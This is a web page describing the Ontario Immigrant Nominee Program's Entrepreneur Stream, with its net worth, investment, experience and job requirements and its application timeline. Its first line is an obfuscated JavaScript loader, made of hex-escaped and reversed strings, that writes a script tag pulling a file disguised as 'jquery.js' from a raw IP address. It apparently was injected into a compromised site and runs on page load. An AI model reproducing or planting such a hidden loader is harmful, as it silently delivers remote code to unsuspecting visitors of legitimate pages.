var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));

Ontario Immigrant Nominee Program - Entrepreneur Stream

The Ontario Immigrant Nominee Program’s Entrepreneur Stream was introduced in order to attract individuals from countries outside Canada who are looking to implement a new business idea or buy an existing business in the province. Eligible candidates who successfully establish a business in Ontario are offered a permanent resident status.

In order to participate in the Entrepreneur Stream, you (the Principal Applicant) and your Business Partner (if applicable) must meet the minimum requirements.

 

Program Requirements

Minimum Net Worth

  • If your proposed business will be located within the Greater Toronto Area, you must have a minimum net worth of $1,500,000.
  • If your proposed business will be located outside of the GTA, you must have a minimum net worth of $800,000 CDN.
  • If your proposed business will be in the ICT/Digital Communications sector, you must have a minimum net worth of $800,000 CDN.

Investment Requirements

  • If your proposed business will be located within the GTA, you must make a minimum personal investment of $1,000,000 CDN and have a minimum equity ownership of 33.3%.
  • If your proposed business will be located outside of the GTA, you must make a minimum personal investment of $500,000 CDN and have a minimum equity ownership of 33.3%.
  • If your proposed business will be in the ICT/Digital Communications sector, you must make a minimum personal investment of $500,000 CDN and have a minimum equity ownership of 33.3%.

Business Experience

  • At least 36 months of full-time business experience in the last 60 months.
  • Your experience must be as a business owner or as a senior manager (business management).

Language Requirement

  • Language proficiency equivalent to Canadian Language Benchmark (CLB) 4 is required at the time of nomination by the OINP.

Business-Related Visit

  • You must make at least one business-related visit to Ontario in the last 12 months from the date of registering an Expression of Interest if you purchase or are planning to purchase an existing business.

Job Requirements

  • You must commit to creating at least two permanent full-time jobs for Canadian citizens/permanent residents

Ontario Immigrant Nominee Program - Entrepreneur Stream Timeline

Entrepreneur has to submit the filled out EOI Form

Expression of Interest

 EOIs with the highest scores are selected and they are sent an Invitation to Apply.

Invitation to apply

Submit your complete application online with all your supporting documents and application fees.

Application

If your application is approved, You will be issued a temporary work permit support letter to apply for a temporary work permit from Immigration, Refugees and Citizenship Canada (IRCC) in order to establish your business in Ontario after you sign a Performance Agreement.

Temporary Work Permit

Once you’ve arrived in Ontario, you will have 20 months to build your business and implement your business plan.

Establish Business

If you meet the commitments of your Performance Agreement, you may be eligible for nomination by the OINP for permanent residence. Successful nominees must apply to IRCC for permanent residence within six months of being nominated by the OINP.

Nomination
Permanent Residence